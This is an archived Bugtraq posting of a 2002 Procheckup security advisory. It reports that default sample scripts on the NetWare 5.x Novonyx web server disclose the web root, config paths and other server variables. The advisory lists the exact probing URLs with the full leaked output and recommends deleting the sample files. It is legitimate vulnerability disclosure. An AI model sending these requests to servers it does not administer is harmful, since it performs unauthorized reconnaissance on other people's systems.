Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerability in Novell Netware 5.0 (part1)

From: <webmaster () procheckup com>
Date: 29 May 2002 13:27:45 -0000


Procheckup Ltd
www.procheckup.com    

Procheckup Security Bulletin PR02-1

           
  Description: Netware default programs displays server 
variables including web root location
         Date: 8/1/2002

  Application: Netware enterprise web server
     Platform: Novell NetWare 5.0
     Severity: Remote attackers can discover the location 
of the webroot.
      Authors: Richard Brain [richard.brain () procheckup com]
Vendor Status:
CVE Candidate: Not assigned
    Reference: www.procheckup.com/security_info/vuln.html

  Description:
 NetWare 5.1 installed with default settings, installs with 
the Novonyx webserver.  This webserver resides on port 80 
and comes with sample files which disclose information


1) Requesting the following url :-
http://webserver/lcgi/sewse.nlm?
sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse     

The following information is returned:-
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE" 
_argv[0] 
= "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE" 

Current directory is 
NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, 
image/pjpeg, */* 
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm 
HTTP_ACCEPT_LANGUAGE=en-gb 
HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows 
NT 5.0; EncExt; T312461; Q312461) 
HTTP_HOST=192.168.1.109 
HTTP_CONNECTION=Keep-Alive 
HTTP_COOKIE=N2S19P61=963269677 
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config 
NETSITE_ROOT=/novonyx/suitespot 
SERVER_NAMES=lcgi 
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-
null Authorization: NS-value-is-null UserDN: NS-value-is-
null 
SERVER_SOFTWARE=Netscape 3.5 for NetWare 
SERVER_PORT=80 
SERVER_NAME=NETWARE.PROCHECKUP.COM 
SERVER_URL=http://192.168.1.109 
REMOTE_HOST=192.168.1.250 
REMOTE_ADDR=192.168.1.250 
HTTPS=OFF 
GATEWAY_INTERFACE=LCGI/1.1 
SERVER_PROTOCOL=HTTP/1.1 
REQUEST_METHOD=GET 
SCRIPT_NAME=/lcgi/sewse.nlm 
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield
.jse 
NS_SESSION=-751448704 
NS_REQUEST=-695399320 
FN=lcgi_map_init 
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 

==========================================================

2) ALSO

Requesting the following url :-
http://192.168.1.109/lcgi/sewse.nlm?
sys:/novonyx/suitespot/docs/sewse/misc/test.jse

The following information is returned:-

SERVER_SOFTWARE=Netscape 3.5 for NetWare 
SERVER_PORT=80 
SERVER_NAME=NETWARE.PROCHECKUP.COM 
SERVER_URL=http://192.168.1.109 
REMOTE_HOST=192.168.1.250 
REMOTE_ADDR=192.168.1.250 
HTTPS=OFF 
GATEWAY_INTERFACE=LCGI/1.1 
SERVER_PROTOCOL=HTTP/1.1 
REQUEST_METHOD=GET 
SCRIPT_NAME=/lcgi/sewse.nlm 
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
 
NS_SESSION=-798892160 
NS_REQUEST=-800372600 
FN=lcgi_map_init 
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 
http://192.168.1.109

3) ALSO

Requests the following url :-
http://webserver/perl/samples/env.pl

The following information is returned:-

HSERVER_SOFTWARE Netscape 3.5 for NetWare 
GATEWAY_INTERFACE LCGI/1.1 
NS_SESSION -707141760 
REMOTE_ADDR 192.168.1.250 
SERVER_PROTOCOL HTTP/1.1 
NS_REQUEST -695399320 
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl 
REQUEST_METHOD GET 
REMOTE_HOST 192.168.1.250 
SERVER_URL http://192.168.1.109 
SERVER_NAMES perl 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows 
NT 5.0; EncExt; T312461; Q312461) 
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, 
image/pjpeg, */* 
HTTP_CONNECTION Keep-Alive 
HTTP_ACCEPT_LANGUAGE en-gb 
HTTPS OFF 
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/ 
FN lcgi_map_init 
SCRIPT_NAME /perl 
HTTP_ACCEPT_ENCODING gzip, deflate 
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config 
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot 
SERVER_NAME NETWARE.PROCHECKUP.COM 
PATH_INFO /samples/env.pl 
HTTP_COOKIE N2S19P61=963269677 
SERVER_PORT 80 
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-
null Authorization: NS-value-is-null UserDN: NS-value-is-
null  
HTTP_HOST 192.168.1.109 
PATH_TRANSLATED 
SYS:novonyx/suitespot/docs/perlroot/samples/env.pl 
NETSITE_ROOT /novonyx/suitespot 

Solution:

Delete all default example programs if not needed.

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this 
Bulletin to the Internet community for the purpose of 
alerting them to problems, if and only if, the Bulletin is 
not edited or changed in any way, is attributed to 
Procheckup, and provided such reproduction and/or 
distribution is performed for non-commercial purposes.


  Any other use of this information is prohibited. 
Procheckup is not
  liable for any misuse of this information by any third 
party.
Previous By Date Next
Previous By Thread Next

Current thread: